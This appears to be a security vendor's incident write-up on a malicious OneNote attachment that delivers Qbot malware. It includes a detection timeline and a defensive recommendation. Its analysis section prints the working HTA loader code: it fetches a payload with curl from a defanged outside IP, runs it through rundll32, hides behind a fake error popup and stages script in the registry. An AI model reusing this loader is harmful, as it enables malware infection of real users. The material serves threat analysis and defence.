Are you still there?

For your security this session will expire in , and you will be logged out.

To extend your session click continue, otherwise your session will automatically close.

Continue Logout
Investigating Malicious Use of OneNote to Deploy Qbot
Sean Savold | 2023-02-03 | 5 min read

High-level Summary

  • Todyl’s MXDR (Managed eXtended Detection and Response) teams observed a threat actor utilizing new TTPs to attempt to install Qbot malware after a user downloaded a malicious OneNote file.
  • Todyl’s Endpoint Security (EDR+NGAV) module immediately blocked the attack attempt to prevent further compromise.
  • The MXDR team responded in minutes and Todyl’s detection engineering team is making additional detections based on these observed behaviors to ensure all partners are protected.
  • We recommend immediately blocking OneNote attachments. This activity also highlights the need for ongoing security awareness training, including phishing tests.

Details on Todyl's Investigation

On February 3rd, 2023, Todyl’s MXDR team received alerts about a suspicious file being launched from OneNote. Upon execution, Todyl’s Endpoint Security (EDR + NGAV) module prevented the behavior and all subsequent stages of the attack.

Recognizing the severity, our MXDR and Detection Engineering teams began testing in our lab environment. Utilizing the Endpoint Security module in detect only mode, we received multiple alerts for malicious activity:

Detection Timeline:

  • Feb 3, 2023 @ 10:19:38 -- Ingress Tool Transfer via CURL
  • Feb 3, 2023 @ 10:19:38 -- Suspicious Windows Script Interpreter Child Process
  • Feb 3, 2023 @ 10:19:38 -- RunDLL32 with Unusual Arguments
  • Feb 3, 2023 @ 10:19:38 -- RunDLL32/Regsvr32 Loads Dropped Executable
  • Feb 3, 2023 @ 10:19:38 -- Windows.Trojan.Qbot
  • Feb 3, 2023 @ 10:19:38 -- Shellcode Injection
  • Feb 3, 2023 @ 10:19:38 -- Suspicious String Value Written to Registry Run Key

Upon running the OneNote file, the user receives instructions to execute and embedded file (Open[.]hta) within the OneNote document:

Within the hta file, we found this encoded file:

Analyzing further, we were able to identify the hta files function mechanism:

<div
function sleep(millis){var date = new Date()

var curDate = null

do { curDate = new Date()
  }while(curDate - date < millis)
  }var shell = new ActiveXObject("wscript.shell")
  /** var url = "https://google.com"
  */shell.run("curl.exe --output C:\\ProgramData\\a4aFOd5wh.png --url " + url, 0)
  sleep(15000)
  var shellap = new ActiveXObject("shell.application")
  shellap.shellexecute("rundll32", "C:\\ProgramData\\a4aFOd5wh.png,Wind", "", "open", 3)
  shell.Popup("This document is corrupted and could not be opened", 0, "Document Error", 16)
  shell.run("taskkill /f /im mshta.exe", 0)
</div>

 <script language="javascript">
  var aPpcY2D6 = "5a29503a4909fcade36b1823e7cebcf5";
  var akD8Sy = "HKCU\\SOFTWARE\\cqptlz\\ug9o\\b8kvyy";
  function avlONjF(aD45uK)
  {
    return(document.getElementById(aD45uK).innerText);
  }
</script>

<script language="vbscript">
  Dim a9lAB
  Set a9lAB = CreateObject("wscript.shell")
  a9lAB.RegWrite akD8Sy, avlONjF("ap6oBZEfG"), "REG_SZ"
</script>

 <script language="javascript">
  var as4JIGMhX = a9lAB.regread(akD8Sy);
  as4JIGMhX = as4JIGMhX.replace(/100&/g, "");
  if(as4JIGMhX)
    {
      var avE9dmu = new Function("url", as4JIGMhX);
    }
</script>

 <script language="vbscript">
  ay8b3d = "hxxp://172[.]96[.]137[].149/72943[.]dat"
  Call avE9dmu(ay8b3d)
  a9lAB.RegDelete(akD8Sy)
</script>

After running the .hta file, a curl command runs to grab 72943[.]dat from hxxp://172[.]96[.]137[.]149/72943[.]dat:

 

At the time of writing, VirusTotal reports this IP as clean. There have been reports of additional files with similar activity: